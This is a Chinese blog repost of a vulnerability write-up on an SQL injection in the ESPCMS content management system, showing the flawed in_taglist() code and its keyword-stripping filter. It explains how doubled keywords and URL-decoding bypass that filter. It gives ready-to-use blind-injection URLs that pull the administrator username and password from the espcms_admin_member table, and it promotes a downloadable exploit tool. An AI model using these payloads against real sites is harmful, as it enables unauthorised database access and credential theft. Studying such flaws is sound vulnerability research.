recommend.php sql注入漏洞,Espcms通杀SQL注入漏洞分析(附EXP)

最新推荐文章于 2024-03-23 20:59:23 发布
最新推荐文章于 2024-03-23 20:59:23 发布
阅读量527 收藏
点赞数
文章标签: recommend.php sql注入漏洞

漏洞:Espcms 通杀 SQL注入漏洞分析附EXP

漏洞作者:Seay博客:www.cnseay.com

官网介绍:

易思ESPCMS企业网站管理系统基于LAMP开发构建的企业网站管理系统,它具有操作简单、功能强大、稳定性好、扩展性及安全性强、二次开发及后期维护方便,可以帮您迅速、轻松地构建起一个强大专业的企业网站。

20130310133324_44292.jpg

收录85W

漏洞在interface/search.php文件和interface/3gwap_search.php文件in_taglist()函数都存在,一样的问题,以

interface/search.php为例说明:

function in_taglist() {

parent::start_pagetemplate();

include_once admin_ROOT . 'public/class_pagebotton.php';

$page = $this->fun->accept('page', 'G');

$page = isset($page) ? intval($page) : 1;

$lng = (admin_LNG == 'big5') ? $this->CON['is_lancode'] : admin_LNG;

$tagkey = urldecode($this->fun->accept('tagkey', 'R'));

$tagkey = $this->fun->inputcodetrim($tagkey);

$db_where = ' WHERE lng=\'' . $lng . '\' AND isclass=1';

if (empty($tagkey)) {

$linkURL = $_SERVER['HTTP_REFERER'];

$this->callmessage($this->lng['search_err'], $linkURL, $this->lng['gobackbotton']);

}

if (!empty($tagkey)) {

$db_where.=" AND FIND_IN_SET('$tagkey',tags)";

}

$pagemax = 20;

$pagesylte = 1;

$templatesDIR = $this->get_templatesdir('article');

$templatefilename = $lng . '/' . $templatesDIR . '/search';

$db_table = db_prefix . 'document';

$countnum = $this->db_numrows($db_table, $db_where);

if ($countnum > 0) {

$numpage = ceil($countnum / $pagemax);

} else {

$numpage = 1;

}

$sql = "SELECT did,lng,pid,mid,aid,tid,sid,fgid,linkdid,isclass,islink,ishtml,ismess,isorder,purview,recommend,tsn,title,longtitle,

color,author,source,pic,link,oprice,bprice,click,description,keywords,addtime,template,filename,filepath FROM $db_table $db_where LIMIT 0,$pagemax";

$this->htmlpage = new PageBotton($sql, $pagemax, $page, $countnum, $numpage, $pagesylte, $this->CON['file_fileex'], 5, $this->lng['pagebotton'], $this->lng['gopageurl'], $this->CON['is_rewrite']);

$sql = $this->htmlpage->PageSQL('pid,did', 'down');

$rs = $this->db->query($sql);

while ($rsList = $this->db->fetch_assoc($rs)) {

由于$tagkey变量使用了urldecode,从而可以绕过GPC,最终

$db_where.=” AND FIND_IN_SET(‘$tagkey’,tags)”;

$tagkey被带入SQL语句。

可以看到下面有

$sql = "SELECT did,lng,pid,mid,aid,tid,sid,fgid,linkdid,isclass,islink,ishtml,ismess,isorder,purview,recommend,tsn,title,longtitle,color,author,source,pic,link,oprice,bprice,click,description,keywords,addtime,template,filename,filepath FROM $db_table $db_where LIMIT 0,$pagemax";

也被带入数据库查询,两条语句可以注入,可以看到第二条SQL语句是可以查询出数据的。但是由于espcms默认配置是不显示SQL语句错误的,而第一条SQL语句查询出来的是count(*),即int,

更蛋疼的是只要第一条查询报错,第二条就不会执行。所以只有用第一条盲注来搞了。

由于espcms本身有防注入函数,在文件

public\class_function.phpinputcodetrim()函数。

function inputcodetrim($str) {

if (empty($str)) return $str;

$str = str_replace("&ampamp;", "&", $str);

$str = str_replace("&ampgt;", ">", $str);

$str = str_replace("&amplt;", "

$str = str_replace("&amplt;", "

$str = str_ireplace("select", "", $str);

$str = str_ireplace("join", "", $str);

$str = str_ireplace("union", "", $str);

$str = str_ireplace("where", "", $str);

$str = str_ireplace("insert", "", $str);

$str = str_ireplace("delete", "", $str);

$str = str_ireplace("update", "", $str);

$str = str_ireplace("like", "", $str);

$str = str_ireplace("drop", "", $str);

$str = str_ireplace("create", "", $str);

$str = str_ireplace("modify", "", $str);

$str = str_ireplace("rename", "", $str);

$str = str_ireplace("count", "", $str);

$str = str_ireplace("from", "", $str);

$str = str_ireplace("group by", "", $str);

$str = str_ireplace("concat", "", $str);

$str = str_ireplace("alter", "", $str);

$str = str_ireplace("cas", "cast", $str);

$str = preg_replace("/]+>/i", "", $str);

$str = preg_replace("/

]+>/i", "

", $str);

$str = preg_replace("/]+>/i", "", $str);

$str = preg_replace("/width=(\'|\")?[\d%]+(\'|\")?/i", "", $str);

$str = preg_replace("/height=(\'|\")?[\d%]+(\'|\")?/i", "", $str);

$str = preg_replace("'

return $str;

}

只是把关键字替换为空,例如union可uunionnion绕过本身防注入,还可以无视不拦截单引号的waf。

猜解用户名长度

http://localhost/espcms/index.php?ac=search&at=taglist&tagkey=cnseay.com%2527,tags) or did>1 and 1=(seselectlect length(username) frfromom espcms_admin_member limit 1) limit 1– by seay

爆破用户名和密码:

http://localhost/espcms/index.php?ac=search&at=taglist&tagkey=cnseay.com%2527,tags) or did>1 and 97=ascii((seselectlect mid(username,1,1) frfromom espcms_admin_member limit 1)) limit 1– by seay

写了个Exp,下载地址

使用方法:espcms_exp_by_Seay.exewww.cnseay.com

即可自动爆出表前缀、用户名、跟密码。

最终上个官网的图:

20130310133652_67077.jpg

长亮不灭
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
刷洞3---espcms注入漏洞
river
05-28 1811
我用的是ESPCMSV6700170807_INSTALL.zip,这个版本的下述漏洞已经修补了,不过我下载的时候不知道,找到了如何修补的方法,自己强行修改为有漏洞的代码,复现了一把。 漏洞位置:adminsoft/control/citylist.php class important extends connector { function important() { ...
sql update 触发器 可获得被update的行的信息
12-15
代码如下: create trigger TgName on tb for update as if update(recommend) begin update tb set commenddate=(getdate()) from tb inner join inserted on tb.vlistid=Inserted.vlistid end recommend表示被更新...
权限提升-Windows权限提升篇&溢出漏洞&土豆家族&全系&补丁对比&EXP筛选
最新发布
siu~
03-23 1110
1、Web到Win-系统提权-土豆家族 2、Web到Win-系统提权-人工操作
plusrecommend.php,plus/recommend.php · 辉辉菜/三强源码 - Gitee.com
weixin_29025911的博客
03-11 236
/**** 信息推荐** @version $Id: recommend.php 1 15:38 2010年7月8日Z tianya $* @package DedeCMS.Site* @copyright Copyright (c) 2007 - 2010, DesDev, Inc.* @license http://help.dedecms....
dedecms recommend.php注入利用,DedeCms recommend.php注入
weixin_33921444的博客
03-11 234
from:http://p2j.cn/?p=798对比了下补丁文件//正在比较文件 3.php 和 4.PHP//***** 修补后.php}//$$_key = $_FILES[$_key]['tmp_name'] = str_replace("\\\\", "\\", $_FILES[$_key]['tmp_name']);$$_key = $_FILES[$_key]['tmp_name']...
Dedecms recommend.php SQL注入漏洞
网站守护中心
04-13 2139
Dedecms recommend.php SQL注入漏洞描述: 目标存在SQL注入漏洞。 1.SQL注入攻击就是攻击者过欺骗数据库服务器执行非授权的任意查询过程。 - 收起 2.漏洞文件recommend.php,某处处理不当,导致绕过形成漏洞。 危害: 被SQL注入后可能导致以下后果: 1.网页被篡改 2.数据被篡改 -Dedecms recommend.php SQL注入
! 熬夜码的 - 八万字 - 让你一文读懂SQL注入漏洞原理及各种场景利用
易编橙 · 终身成长社群,相遇已是上上签!
10-24 1447
WEB攻防漏洞的本质 漏洞特定函数: 漏洞的成因必然会涉及到所用的函数,不同的开发语言都有一些特定的函数用于不同的作用。 有些函数用于数据库查询,有的函数用于文件读写,有的函数用于调试输出等。函数在使用的时候会和漏洞形成的关系是什么? 漏洞产生的原因必定会使用到类似的脚本语言的特定函数,比如SQL注入漏洞,必然会涉及到数据库查询操作类的相关函数。 这就是漏洞的特定函数。所以在代码层,我们就可以过函数猜解存在有那些漏洞,反推也可以根据漏洞猜解使用了哪些特定函数。 传输可
wLHK-Dedecms漏洞整理.pdf
09-20
最后,我们可以看到Dedecms 5.7 /plus/recommend.php SQL 注入漏洞也存在于推荐页面中,攻击者可以过构造特殊的输入来 inject恶意SQL语句,从而获取或修改数据库中的数据。 Dedecms漏洞整理报告中包含了多个漏洞...
recommend.zip_Recommend算法_推荐数据集_推荐算法_电商
07-15
机器学习入门经典算法中的推荐算法,各大电商网站必备算法,内含数据集。
gaokao-recommend.zip
11-15
gaokao-recommend.zip高考推荐系统ruoyi
espcms csrf漏洞 导致任意管理员添加1
08-03
漏洞简介:ESPCMSV6 是一套基于 LAMP 开发构建的企业网站管理系统。ESPCMS 后台添加管理员页面 缺少 token 导致 csrf 漏洞 可任意添
Seay源代码审计系统2.1源码.rar
02-25
Seay源代码审计系统2.1源码
recommend-system.py
08-21
该代码主要包含常见几种相似度计算方法,基于用户的协同过滤推荐。
dedecms recommend.php注入利用,DedeCMS全版本SQL注入漏洞利用代码及工具2014年2月28日...
weixin_39765100的博客
03-11 94
dedecms即织梦(PHP开源网站内容管理系统)。织梦内容管理系统(DedeCms) 以简单、实用、开源而闻名,是国内最知名的PHP开源网站管理系统,也是使用用户最多的PHP类CMS系统。近日,网友在dedecms中发现了全版本SQL注入漏洞,目前官方最新版已修复该漏洞,相关利用代码如下:EXP:复制代码代码如下:http://*.*.com/plus/recommend.php?acti...
plusrecommend.php,DedeCMSrecommend.php文件SQL注入漏洞原理分析 | 学步园
weixin_42508792的博客
03-11 428
漏洞执行过程1.首先执行到plus/recommand.php,包含了include/common.inc.phprequire_once(dirname(__FILE__)."/../include/common.inc.php");2来看到include/common.inc.phpfunction _RunMagicQuotes(&$svar){if(!get_magic_quote...
dedecms recommend.php注入利用,DedeCMS recommend.php文件SQL注入漏洞利用代码及工具...
weixin_42300398的博客
03-11 318
dedecms即织梦(PHP开源网站内容管理系统)。织梦内容管理系统(DedeCms) 以简单、实用、开源而闻名,是国内最知名的PHP开源网站管理系统,也是使用用户最多的PHP类CMS系统,近日,网友在dedecms中发现了全版本SQL注入漏洞,目前官方最新版已修复该漏洞,相关利用代码如下:EXP:Exp:plus/recommend.php?action=&aid=1&_F...
审计espcms注入漏洞
qq_35420342的博客
04-07 1793
    正在学习代码审计,动手审计了一下seay在2013年发现的espcms注入漏洞,记录下来:    主要问题函数为interface/search.php中的in_taglist()函数:function in_taglist() { parent::start_pagetemplate(); include_once admin_ROOT . 'public/class_pageb...
关于espcmssql注入漏洞代码审计复现
zhalang8324的博客
05-25 4301
一个关于espcms注入漏洞的代码审计过程复现
espcms5.7.13 sql注入漏洞复现
wanguixiu的博客
06-29 571
espcms5.7.13 sql注入漏洞复现 作者: admin 时间: 2021-06-28 分类: 漏洞复现 使用代码审计工具自动审计,找到select语句,双击进入/adminsoft/control/citylist.php文件可以看到$sql = "select * from $db_table where parentid=$pa...
if (args.length != 5) { println("Usage: /usr/local/spark/bin/spark-submit --class recommend.MovieLensALS " + "Spark_Recommend.jar movieLensHomeDir personalRatingsFile bestRank bestLambda bestNumiter") sys.exit(1)是什么意思
06-03
这段代码是在 Spark 上运行协同过滤算法的一个例子,用于推荐电影。首先,它检查传递给应用程序的参数数量是否为 5,如果不是,它将打印出用法信息,然后退出应用程序。如果参数数量正确,则应用程序将使用传递的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值